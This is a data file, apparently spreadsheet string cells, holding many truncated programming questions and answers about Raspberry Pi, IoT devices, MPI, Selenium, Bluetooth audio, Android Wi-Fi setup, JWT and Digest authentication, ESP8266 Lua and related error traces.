sudo mpirun --alow-run-as-root --oversubscribe -n 1 --host localhost /home/pi/Desktop/host /some.jpeg : -n 2 --host localhost,localhost /home/pi/Desktop/relay
//host
int main(int argc, char *argv[]) {
    MPI_Init(&amp;argc, &amp;argv);
    int world_size = []() {
        int size;
        MPI_Comm_size(MPI_COMM_WORLD, &amp;size);
        return size;
    }();
    int id = []() {
        int id;
        MPI_Comm_rank(MPI_COMM_WORLD, &amp;id);
        return id;
    }();
    if (argc != 2) {
        std::cerr &lt;&lt; "Filepath not passed\n";
        MPI_Finalize();
        return 0;
    }
    const std::filesystem::path filepath(argv[1]);
    if (not std::filesystem::exists(filepath)) {
        std::cerr &lt;&lt; "File doesn't exist\n";
        MPI_Finalize();
        return 0;
    }
    std::cout &lt;&lt; "World size: " &lt;&lt; world_size &lt;&lt; '\n';
    MPI_Finalize();
    return 0;
}
//relay
int main(int argc, char *argv[]) {
    MPI_Init(&amp;argc, &amp;argv);
    int world_size = []() {
        int size;
        MPI_Comm_size(MPI_COMM_WORLD, &amp;size);
        return size;
    }();
    int id = []() {
        int id;
        MPI_Comm_rank(MPI_COMM_WORLD, &amp;id);
        return id;
    }();
    std::cout &lt;&lt; "World size: " &lt;&lt; world_size &lt;&lt; '\n';
    MPI_Finalize();
    return 0;
}
How do I configure nodes to allow them to run MPI programs with sudo?</t>
  </si>
  <si>
    <t>Here are my versions:
I think I have compatible versions of the driver and firefox (this seems to work):
When I run the following code:
def __init__(self, tag, user_name, password, driver_location, headless):
    logger = logging_utils.get_logger()
    logging_utils.start_function(logger, user_name=user_name)
    self.tag = tag
    self.user_name = user_name
    self.password = password
    self.cards = []
    driver_options = Options()
    driver = None
    try:
        if "chrome" in driver_location.lower():
            if headless:
                driver_options.add_argument("--headless")
            driver = webdriver.Chrome(executable_path=os.path.abspath("chromedriver.exe"),
                                      chrome_options=driver_options)
        elif "gecko" in driver_location.lower():
            binary = FirefoxBinary("/usr/bin/firefox")
            driver_options.binary = binary
            profile = webdriver.FirefoxProfile()
            driver_options.profile = profile
            driver_options.set_headless(headless)
            driver = webdriver.Firefox(firefox_binary=binary,
                                       firefox_profile=profile,
                                       executable_path=os.path.abspath(driver_location),
                                       firefox_options=driver_options)
I get this error:
Traceback (most recent call last):
  File "/mnt/usbdrive/python/AmexOfferChecker/amexParser.py", line 105, in __init__
    firefox_options=driver_options)
  File "/home/jordan/.local/lib/python2.7/site-packages/selenium/webdriver/firefox/webdriver.py", line 158, in __init__
    keep_alive=True)
  File "/home/jordan/.local/lib/python2.7/site-packages/selenium/webdriver/remote/webdriver.py", line 154, in __init__
    self.start_session(desired_capabilities, browser_profile)
  File "/home/jordan/.local/lib/python2.7/site-packages/selenium/webdriver/remote/webdriver.py", line 243, in start_session
    response = self.execute(Command.NEW_SESSION, parameters)
  File "/home/jordan/.local/lib/python2.7/site-packages/selenium/webdriver/remote/webdriver.py", line 312, in execute
    self.error_handler.check_response(response)
  File "/home/jordan/.local/lib/python2.7/site-packages/selenium/webdriver/remote/errorhandler.py", line 237, in check_response
    raise exception_class(message, screen, stacktrace)
SessionNotCreatedException: Message: Unable to find a matching set of capabilities
Any suggestions would be most welcome!</t>
  </si>
  <si>
    <t>I have written this code to make an LED blink on Raspberry Pi 3 in Ubuntu Mate OS:
I tried to compile the code by using:
But it fails to compile, and gives me these errors:
/usr/lib/gcc/arm-linux-gnueabihf/5/../../../../lib/libwiringPi.so: undefined reference to `crypt'
/usr/lib/gcc/arm-linux-gnueabihf/5/../../../../lib/libwiringPi.so: undefined reference to `rint'
/usr/lib/gcc/arm-linux-gnueabihf/5/../../../../lib/libwiringPi.so: undefined reference to `pthread_join'
/usr/lib/gcc/arm-linux-gnueabihf/5/../../../../lib/libwiringPi.so: undefined reference to `pthread_create'
/usr/lib/gcc/arm-linux-gnueabihf/5/../../../../lib/libwiringPi.so: undefined reference to `pow'
/usr/lib/gcc/arm-linux-gnueabihf/5/../../../../lib/libwiringPi.so: undefined reference to `shm_open'
/usr/lib/gcc/arm-linux-gnueabihf/5/../../../../lib/libwiringPi.so: undefined reference to `pthread_cancel'
collect2: error: ld returned 1 exit status
I installed all the necessary things for WiringPi, but I am not able find the solution for the above error.</t>
  </si>
  <si>
    <t>https://pub.dartlang.org/packages/shelf
https://pub.dartlang.org/packages/shelf_auth
https://pub.dartlang.org/packages/shelf_bind
https://pub.dartlang.org/packages/shelf_exception_response
https://pub.dartlang.org/packages/shelf_injection_router
https://pub.dartlang.org/packages/shelf_path
https://pub.dartlang.org/packages/shelf_route
https://pub.dartlang.org/packages/shelf_rest
https://pub.dartlang.org/packages/shelf_static
https://pub.dartlang.org/packages/shelf_web_socket
https://pub.dartlang.org/packages/http_multi_server
https://pub.dartlang.org/packages/shelf_html (for the client side)
http://thomaslockerambling.blogspot.co.at/2014/09/dart-shelf-and-unit-testing.html#links (Dart Shelf and unit testing)  
https://plus.google.com/+AndersHolmgren1/posts/96jxrWA52db (some shelf_route tips)</t>
  </si>
  <si>
    <t>s.next() : "";
    }
    private static String createJwtRsaPassword(String projectId, byte[] privateKeyBytes) throws NoSuchAlgorithmException, InvalidKeySpecException {
        return createPassword(projectId, privateKeyBytes, "RSA", SignatureAlgorithm.RS256);
    }
    private static String createPassword(String projectId, byte[] privateKeyBytes, String algorithmName, SignatureAlgorithm signatureAlgorithm) throws NoSuchAlgorithmException, InvalidKeySpecException {
        Instant now = Instant.now();
        // Create a JWT to authenticate this device.</t>
  </si>
  <si>
    <t>Is there a way to have the file path of the certificate and keystore as String 
To get keystorePasswordPair the filepath is used like that in the SampleUtil class:
The loadCertificateFromFile method generates a File with the filename (certificateFile) as String and obviously the file is not found because of an invalid filepath  :
private static List&lt;Certificate&gt; loadCertificatesFromFile(final String filename) {
    File file = new File(filename);
    if (!file.exists()) {
        System.out.println("Certificate file: " + filename + " is not found.</t>
  </si>
  <si>
    <t>i have tried different tutorial from internet but didn't worked
in windows it is working as i expected but not in raspberry pi3
Error:
Traceback (most recent call last): File "/home/pi/Desktop/FYProject/Main.py", line 171, in main()
File "/home/pi/Desktop/FYProject/Main.py", line 72, in main pwd='Password')
pyodbc.Error: ('01000', "[01000] [unixODBC][Driver Manager]Can't open lib 'SQL Server' : file not found (0) (SQLDriverConnect)")</t>
  </si>
  <si>
    <t>I am able to connect to the device using
The device info looks like it correctly detected the device:
    Device 00:23:01:04:95:CC (public)
        Name: Voice-BoomBox
        Alias: Voice-BoomBox
        Class: 0x00240404
        Icon: audio-card
        Paired: yes
        Trusted: yes
        Blocked: no
        Connected: yes
        LegacyPairing: no
        UUID: Headset                   (00001108-0000-1000-8000-00805f9b34fb)
        UUID: Audio Sink                (0000110b-0000-1000-8000-00805f9b34fb)
        UUID: Advanced Audio Distribu.. (0000110d-0000-1000-8000-00805f9b34fb)
        UUID: Handsfree                 (0000111e-0000-1000-8000-00805f9b34fb)
Afterwards I still cannot find anything suspicious in the logs:
    Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/bluez.c:857: Profile method call: org.bluez.Profile1.NewConnection()
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/transport.c:688: State transition: 0 -&gt; 2
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/transport.c:104: Created new IO thread: HFP Audio Gateway
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/ctl.c:675: +-+-
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/bluez.c:797: HFP Audio Gateway configured for device 00:23:01:04:95:CC
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/transport.c:688: State transition: 0 -&gt; 2
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/transport.c:104: Created new IO thread: HFP Audio Gateway
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/io.c:1195: Starting IO loop: HFP Audio Gateway
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:573: Starting RFCOMM loop: HFP Audio Gateway
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/at.c:160: AT message: SET: command:+BRSF, value:59
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:+BRSF, value:992
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:(null), value:OK
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:114: HFP state transition: 0 -&gt; 2
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/at.c:160: AT message: TEST: command:+CIND, value:(null)
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:+CIND, value:("call",(0,1)),("callsetup",(0-3)),("service",(0-1)),("signal",(0-5)),("roam",(0-1)),("battchg",(0-5)),("callheld",(0-2))
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:(null), value:OK
Feb 12 13:26:28 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:114: HFP state transition: 2 -&gt; 5
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/at.c:160: AT message: GET: command:+CIND, value:(null)
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:+CIND, value:0,0,0,0,0,0,0
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:(null), value:OK
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:114: HFP state transition: 5 -&gt; 7
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/at.c:160: AT message: SET: command:+CMER, value:3, 0, 0, 1
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:(null), value:OK
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:114: HFP state transition: 7 -&gt; 8
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:114: HFP state transition: 8 -&gt; 9
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:114: HFP state transition: 9 -&gt; 13
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/ctl.c:675: +-+-
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/at.c:160: AT message: SET: command:+VGS, value:15
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:(null), value:OK
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/ctl.c:675: +-+-
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/at.c:160: AT message: GET: command:+BTRH, value:(null)
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:(null), value:OK
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/at.c:160: AT message: CMD: command:+CLCC, value:(null)
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: Unsupported AT message: CMD: command:+CLCC, value:(null)
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:(null), value:ERROR
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/at.c:160: AT message: SET: command:+CSRSF, value:0,0,0,1,0,0,0
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: Unsupported AT message: SET: command:+CSRSF, value:0,0,0,1,0,0,0
Feb 12 13:26:29 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/rfcomm.c:96: Sending AT message: RESP: command:(null), value:ERROR
Feb 12 13:26:30 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/bluez.c:608: Endpoint method call: org.bluez.MediaEndpoint1.SelectConfiguration()
Feb 12 13:26:30 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/bluez.c:608: Endpoint method call: org.bluez.MediaEndpoint1.SetConfiguration()
Feb 12 13:26:30 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/bluez.c:540: A2DP Source (SBC) configured for device 00:23:01:04:95:CC
Feb 12 13:26:30 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/bluez.c:542: Configuration: channels: 2, sampling: 48000
Feb 12 13:26:30 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/transport.c:688: State transition: 0 -&gt; 0
Feb 12 13:26:30 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/bluez.c:675: Registering endpoint: /A2DP/SBC/Source/2
Feb 12 13:26:30 raspberrypi bluealsa[373]: /usr/bin/bluealsa: ../../src/ctl.c:675: +-+-
Feb 12 13:26:30 raspberrypi bluetoothd[336]: Endpoint registered: sender=:1.6 path=/A2DP/SBC/Source/2
When playing sound via aplay (aplay -D bluealsa:HCI=hci0,DEV=00:23:01:04:95:CC,PROFILE=a2dp test16.wav) the sound plays correctly.</t>
  </si>
  <si>
    <t>Thank you
Error
Script
The indentations for my lines were wrong though after correting my lines im getting a instance has no attribute 'readFile"
  File "door_controllerTEST_V4_RFID.py", line 99, in &lt;module&gt;
    main()
  File "door_controllerTEST_V4_RFID.py", line 92, in main
    authenticator = RfidFileAuthenticator()
  File "door_controllerTEST_V4_RFID.py", line 73, in __init__
    self.readFile()
AttributeError: RfidFileAuthenticator instance has no attribute 'readFile'
How my script looks now
class RfidInput:
    def getInput(self):
        print "waiting for tag"
        tag = raw_input()
        return AuthToken(None,tag)
class RfidFileAuthenticator:
    filename = "tags.txt"
    tags = dict()
    def __init__(self):
        self.readFile()
    def readfile(self):
        secrets = open(self.filename, 'r')
        print "reading from " + self.filename + " file"
        for line in secrets:
                line = line.rstrip('\n')
                id, tag = line.split(',')
                self.tags[tag] = id
    def check(self,token):
        print "checking if " + token.secret + " is valid"
        if token.secret in self.tags:
            print "tag found belonging to: " + self.tags[token.secret]
            return True
        else: "tag not found"
        print
        return False</t>
  </si>
  <si>
    <t>Here is my Logcat   
I've also given given it the following permissions 
&lt;uses-permission android:name="android.permission.BLUETOOTH" /&gt;
    &lt;uses-permission android:name="android.permission.BLUETOOTH_ADMIN" /&gt;
    &lt;uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /&gt;
    &lt;uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /&gt;
    &lt;uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /&gt;
    &lt;uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" /&gt;
    &lt;uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /&gt;
    &lt;uses-permission android:name="com.google.android.things.permission.SET_TIME" /&gt;
    &lt;uses-permission android:name="android.permission.WRITE_SETTINGS"
        tools:ignore="ProtectedPermissions" /&gt;
    &lt;uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /&gt;
    &lt;uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /&gt;
    &lt;uses-permission android:name="com.google.android.things.permission.USE_PERIPHERAL_IO" /&gt;
    &lt;uses-permission android:name="android.permission.INTERNET"/&gt;
    &lt;permission android:name="android.permission.OVERRIDE_WIFI_CONFIG"
        android:protectionLevel="signature|privileged" /&gt;
Here is my code 
 private void connectToWifi(final String networkSSID, final String networkPassword) {
        if (!wifiManager.isWifiEnabled()) {
            wifiManager.setWifiEnabled(true);
        }
        WifiConfiguration conf = new WifiConfiguration();
        conf.SSID = String.format("\"%s\"", networkSSID);
        conf.preSharedKey = String.format("\"%s\"", networkPassword);
        int netId = wifiManager.addNetwork(conf);
        wifiManager.disconnect();
        wifiManager.enableNetwork(netId, true);
        wifiManager.reconnect();
    }</t>
  </si>
  <si>
    <t>Identifier rules
Methods
Equal sign in methods
Operator notation and the rules
Multiple ways to define a method/function (leave parentheses in method calls)
Unary operators
Multiple parameter lists
Right-associative method names
Side effect free methods
Missing parentheses at methods
Why no i++ in Scala?</t>
  </si>
  <si>
    <t>See: https://urllib3.readthedocs.org/en/latest/security.html
Traceback (most recent call last):
File "&lt;pyshell#9&gt;", line 1, in &lt;module&gt;
cal_principal=cal_client.principal()
File "C:\PROGS\Python27\lib\site-packages\caldav\davclient.py", line 113, in principal
return Principal(self)
File "C:\PROGS\Python27\lib\site-packages\caldav\objects.py", line 307, in __init__
cup = self.get_properties([dav.CurrentUserPrincipal()])
File "C:\PROGS\Python27\lib\site-packages\caldav\objects.py", line 182, in get_properties
raise Exception("The CalDAV server you are using has "
Exception: The CalDAV server you are using has a problem with path handling.</t>
  </si>
  <si>
    <t>I also turned up mic sensitivity with export ASSISTANT_MIC_SENSITIVITY=-6
Here's some of hotword.py
# My imports
import RPi.GPIO as IO        
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db
#start my code --------------------------------------------------------
cred = credentials.Certificate('/path-to-certificate')
default_app = firebase_admin.initialize_app(cred, {
    'databaseURL' : 'https://myproject.firebaseio.com/'
})
IO.setwarnings(False)          
IO.setmode (IO.BOARD) 
IO.setup(16,IO.OUT)
p = IO.PWM(16,50)
root = db.reference()
print("ok")
#end my code ----------------------------------------------------------
def process_event(event):
    if event.type == EventType.ON_CONVERSATION_TURN_STARTED:
        print()
    print(event)
    if event.type == EventType.ON_DEVICE_ACTION:
        for command, params in event.actions:
            print('Do command', command, 'with params', str(params))
        #My code start ----------------------------------------------------------------
           if command == "action.devices.commands.OnOff":
                if params['on']:
                    print('Turning the LED on.')</t>
  </si>
  <si>
    <t>The command and event objects the library passes to callbacks have the following properties:
cmd/evt.deviceType
the typeId of the device
cmd/evt.deviceId
the deviceId of the device
cmd/evt.device
the typeId:deviceId unique identifier for the device within your organization
cmd.command/evt.event
the ID/name of the command/event
cmd/evt.format
the format of the command/event message
cmd/evt.payload
the raw payload of the command (this seems to only be available for events at the moment .. oops, will correct in 0.1.8)
cmd/evt.data
the parsed data from the command payload (as a python dictionary), library supports parsing of any message format as long as an appropriate codec has been registered for the format
If you send a command with format "json" with the following content: {"d": {"buttonPushed": true}} then cmd.data will look like this:
cmd.data == {
  "d": {
    "buttonPushed": true
  }
}
The plain json parser makes no assumptions about the shape of your json and works as long as your payload is valid json.</t>
  </si>
  <si>
    <t>ComicSansMS provided a great answer the essence of which is that you need to replace
with
Thus a standalone example could be like this:
--wifi.setmode(wifi.NULLMODE)
config = {}
config.SSID = {}
config.SSID["ssid"] = "password"
function wifi_wait_ip()
  if wifi.sta.getip() == nil then
    print("IP unavailable, Waiting...")
  else
    tmr.stop(1)
    print("\n====================================")
    print("ESP8266 mode is: " .. wifi.getmode())
    print("MAC address is: " .. wifi.ap.getmac())
    print("IP is " .. wifi.sta.getip())
    print("====================================")
  end
end
function wifi_start(list_aps)
  if list_aps then
    for key, value in pairs(list_aps) do
      if config.SSID and config.SSID[key] then
        wifi.setmode(wifi.STATION);
        wifi.sta.config{ssid=key, pwd=config.SSID[key]}
        -- wifi.sta.connect() not needed as config() uses auto-connect=true by default
        print("Connecting to " .. key .. " ...")
        tmr.alarm(1, 2500, 1, wifi_wait_ip)
      end
    end
  else
    print("Error getting AP list")
  end
end
function start()
  print("Configuring Wifi ...")
  wifi.setmode(wifi.STATION)
  wifi.sta.getap(wifi_start)
end
start()</t>
  </si>
  <si>
    <t>My java main class looks like this: `public static String IP; //NULL Variables for the MySQL server IP
    public static final String user = "user"; //Username for the mySQL sever
    public static final String password = "pass"; //Password for the mySQL server TODO figure out how to hide password
    static Connection conn; //NULL connection to get connected to the mySQL server
    public static Scanner console = new Scanner(System.in); //Used to get numbers and strings from console
This is the error I get when I try to connect to my external IPV4 address `Communications link failure
The last packet sent successfully to the server was 0 milliseconds ago.</t>
  </si>
  <si>
    <t>It has the following features
Create, Add, Extract, Update, Remove files from a Zip file
Read/Write password protected Zip files
Supports AES 128/256 Encryption
Supports Standard Zip Encryption
Supports Zip64 format
Supports Store (No Compression) and Deflate compression method
Create or extract files from Split Zip files (Ex: z01, z02,...zip)
Supports Unicode file names
Progress Monitor
The project home page: http://www.lingala.net/zip4j/</t>
  </si>
  <si>
    <t>");
            client.disconnect();
        } catch (MqttException e) {
            throw new IllegalStateException(e);
        }
    }
}
IotCorePasswordGenerator class:
    package com.cacaosd.sample1;
import android.content.res.Resources;
import android.util.Base64;
import java.io.IOException;
import java.io.InputStream;
import java.security.KeyFactory;
import java.security.NoSuchAlgorithmException;
import java.security.spec.InvalidKeySpecException;
import java.security.spec.PKCS8EncodedKeySpec;
import java.time.Duration;
import java.time.Instant;
import java.util.Date;
import io.jsonwebtoken.JwtBuilder;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
class IotCorePasswordGenerator {
    private final String projectId;
    private final Resources resources;
    private final int privateKeyRawFileId;
    IotCorePasswordGenerator(String projectId, Resources resources, int privateKeyRawFileId) {
        this.projectId = projectId;
        this.resources = resources;
        this.privateKeyRawFileId = privateKeyRawFileId;
    }
    char[] createJwtRsaPassword() {
        try {
            byte[] privateKeyBytes = decodePrivateKey(resources, privateKeyRawFileId);
            return createJwtRsaPassword(projectId, privateKeyBytes).toCharArray();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("Algorithm not supported.</t>
  </si>
  <si>
    <t>Here are some of the APIs for configuring tests:
params - Custom URL query string key/value pairs 
testPath - URL Path to tests
testRunnerPath - URL to QUnit/xUnit
loginRequired - Boolean for toggle Login preprocessing hook
References
TestSwarm Prerequisites
Setting up TestSwarm
TestSwarm: Setting Up Jobs/Tests
Running tests with TestSwarm
TestSwarm Video Walkthru
Automating Cross-Browser Testing
Continuous Integration Workflow
Integrating TestSwarm with Hudson</t>
  </si>
  <si>
    <t>ERROR IS FOLLOWING :- C:\Python33&gt;python mailarduino.py Traceback
  (most recent call last): File "mailarduino.py", line 13, in 
  newmails = int(feedparser.parse(PROTO + USERNAME + ":" + PASSWORD +
  "@" + SE RVER + PATH)["feed"]["fullcount"]) File
  "C:\Python33\lib\site-packages\feedparser-5.1-py3.3.egg\feedparser.py",
  l ine 346, in getitem return dict.getitem(self, key) KeyError:
  'fullcount'
C:\Python33&gt;</t>
  </si>
  <si>
    <t>password : null;
        }
        a.href = url;
        s.url = url;
    }
    s = $.extend({
        requestUri: a.pathname + a.search,
        username: u,
        password: p,
        type: 'GET'
    }, s);
    var dfd = $.Deferred();
    return dfd.promise(doAjaxUnauthorized());
    function doAjaxUnauthorized() {
        //If the request is successful, invoke callbacks immediately 
        //without using Digest authentication
        return $.ajax(s)
            .done(function(data, textStatus, jqXHR) {
                dfd.resolve(data, textStatus, jqXHR);
            })
            .fail(function(jqXHR, textStatus, errorThrown) {
                //Only attempt Digest authentication on a 401/407 response
                if (jqXHR.status === 401 || jqXHR.status === 407) {
                    doAjaxAuthorized(createAuthorizationHeader(jqXHR));
                }
                else {
                    dfd.reject(jqXHR, textStatus, errorThrown);
                }
            });
    }
    function doAjaxAuthorized(header) {
        if (s.headers === undefined) {
            s.headers = {};
        }
        s.headers.Authorization = header;
        return $.ajax(s)
            .done(function(data, textStatus, jqXHR) {
                if (DigestAjax.UNAUTH_HA1 !== null) {
                    DigestAjax.AUTH_HA1 = DigestAjax.UNAUTH_HA1;
                    DigestAjax.UNAUTH_HA1 = null;
                }
                if (DigestAjax.UNAUTH_USERNAME !== null) {
                    DigestAjax.AUTH_USERNAME = DigestAjax.UNAUTH_USERNAME;
                    DigestAjax.UNAUTH_USERNAME = null;
                }
                dfd.resolve(data, textStatus, jqXHR);
            })
            .fail(function(jqXHR, textStatus, errorThrown) {
                if (jqXHR.status === 401 || jqXHR.status === 407) {
                    DigestAjax.AUTH_HA1 = null;
                    DigestAjax.AUTH_USERNAME = null;
                }
                dfd.reject(jqXHR, textStatus, errorThrown);
            });
    }
    function createAuthorizationHeader(xhr) {
        var header = xhr.getResponseHeader(DigestAjax.WWW_AUTHENTICATE);
        if (header !== undefined &amp;&amp; header !== null) {
            var params = parseWWWAuthenticateHeader(header);
            var qop = params.qop;
            var clientQop = 'auth';
            if (qop !== undefined &amp;&amp; qop.toLowerCase() === 'auth-int') {
                clientQop = 'auth-int';
            }
            //HA1 Calculation
            var algorithm = params.algorithm;
            var ha1;
            var username;
            var cnonce;
            if (DigestAjax.AUTH_HA1 !== null) {
                ha1 = DigestAjax.AUTH_HA1;
                username = DigestAjax.AUTH_USERNAME;
            }
            else {
                if (s.username === null || s.password === null) {
                    var auth = $.extend({
                        username: '',
                        password: ''
                    }, DigestAjax.authHelper());
                    $.extend(s, auth);
                }
                if (algorithm !== undefined &amp;&amp; algorithm.toLowerCase() === 'md5-sess') {
                    cnonce = generateCnonce();
                    ha1 = CryptoJS.MD5(CryptoJS.MD5(s.username + ':' 
                            + params.realm + ':' + s.password) + ':' 
                            + params.nonce + ':' + cnonce);
                }
                else {
                    ha1 = CryptoJS.MD5(s.username + ':' + params.realm + ':' + s.password);
                }
                username = s.username;
                DigestAjax.UNAUTH_HA1 = ha1;
                DigestAjax.UNAUTH_USERNAME = s.username;
            }
            //HA2 Calculation
            var ha2, response;
            if (clientQop === 'auth-int') {
                var body = s.data ?</t>
  </si>
  <si>
    <t>The mainpage
Page 1
Page 2
Imports Windows.UI.Core
Public NotInheritable Class BlankPage2
Inherits Page
Public Sub New()
    Me.InitializeComponent()
    AddHandler Window.Current.CoreWindow.KeyUp, AddressOf CoreWindow_KeyUp
End Sub
Protected Overrides Sub OnNavigatedTo(e As NavigationEventArgs)
End Sub
Private Sub CoreWindow_KeyUp(sender As CoreWindow, e As KeyEventArgs)
    'we halen de virtuele waarde van de ingedrukte knop op
    Dim Value As String = e.VirtualKey
    'Enter knop
    If Value = "13" Then
        GotoNext()
    End If
End Sub
Private Sub GotoNext()
    Frame.Navigate(GetType(MainPage))
End Sub
End Class
Strangely when you hit enter 9 times it stops and I don't know why.</t>
  </si>
  <si>
    <t>/usr/bin/python3
import sys
import os
f = open('/home/pi/test.txt', 'a+')
f.write('success on ' + sys.argv[1] + ' with CWD=' + os.getcwd() + '\n')
f.close()
Which is registered that way:
$ incrontab -l
/home/pi IN_CREATE,IN_DELETE /home/pi/test.py $@
Now you will see in /home/pi/test.txt
success on /home/pi/ with CWD=/
which explains that your script first tries to write /test.txt and has not required permission on file system to do so.</t>
  </si>
  <si>
    <t>After I have tried to download the code to the ESP8266 I only get this error: 
PANIC: unprotected error in call to Lua API (wifi_setup.lua:25: bad argument #1 to 'config' (config table not found!))</t>
  </si>
  <si>
    <t>If i remove comment from the "get part" I recive this errors:
PANIC: unprotected error in call to Lua API (not enough memory)
PANIC: unprotected error in call to Lua API (attempt to call a string value)
if i run the 2 script separately no error is reported
The get part is a download script option, if present in a web server it is downloaded (to remotelly upgrade lua scritps)
It's for my windows shield.</t>
  </si>
  <si>
    <t>","timestampUtc":"2019-08-23T09:17:53.762099Z"}
  Source=&lt;Cannot evaluate the exception source&gt;
  StackTrace:
&lt;Cannot evaluate the exception stack trace&gt;
Below is the input to device client along with certificate:    
    private static string s_idScope = "0ne00074417";
    private const string GlobalDeviceEndpoint = "global.azure-devices-provisioning.net";
    private static string s_certificateFileName = "simulateddevicecert.pfx";
Is there anything missing in the setup that is causing this error?</t>
  </si>
  <si>
    <t>06-21 13:58:54.053 11499-12787/org.wso2.iot.agent E/Volley: [714] NetworkDispatcher.run: Unhandled exception java.lang.SecurityException: Admin ComponentInfo{org.wso2.iot.agent/org.wso2.iot.agent.services.AgentDeviceAdminReceiver} does not own the device
                                                        java.lang.SecurityException: Admin ComponentInfo{org.wso2.iot.agent/org.wso2.iot.agent.services.AgentDeviceAdminReceiver} does not own the device
                                                            at android.os.Parcel.readException(Parcel.java:1689)
                                                            at android.os.Parcel.readException(Parcel.java:1641)
                                                            at android.app.admin.IDevicePolicyManager$Stub$Proxy.setAutoTimeRequired(IDevicePolicyManager.java:6759)
                                                            at android.app.admin.DevicePolicyManager.setAutoTimeRequired(DevicePolicyManager.java:3377)
                                                            at org.wso2.iot.agent.services.operation.OperationManagerDeviceOwner.setAutoTimeRequired(OperationManagerDeviceOwner.java:681)
                                                            at org.wso2.iot.agent.services.operation.OperationProcessor.doTask(OperationProcessor.java:219)
                                                            at org.wso2.iot.agent.services.operation.OperationProcessor.setPolicyBundle(OperationProcessor.java:267)
                                                            at org.wso2.iot.agent.services.operation.OperationProcessor.doTask(OperationProcessor.java:125)
                                                            at org.wso2.iot.agent.services.MessageProcessor.performOperation(MessageProcessor.java:130)
                                                            at org.wso2.iot.agent.services.MessageProcessor.onReceiveAPIResult(MessageProcessor.java:327)
                                                            at org.wso2.iot.agent.proxy.APIController$9.parseNetworkResponse(APIController.java:383)
                                                            at com.android.volley.NetworkDispatcher.run(NetworkDispatcher.java:123)
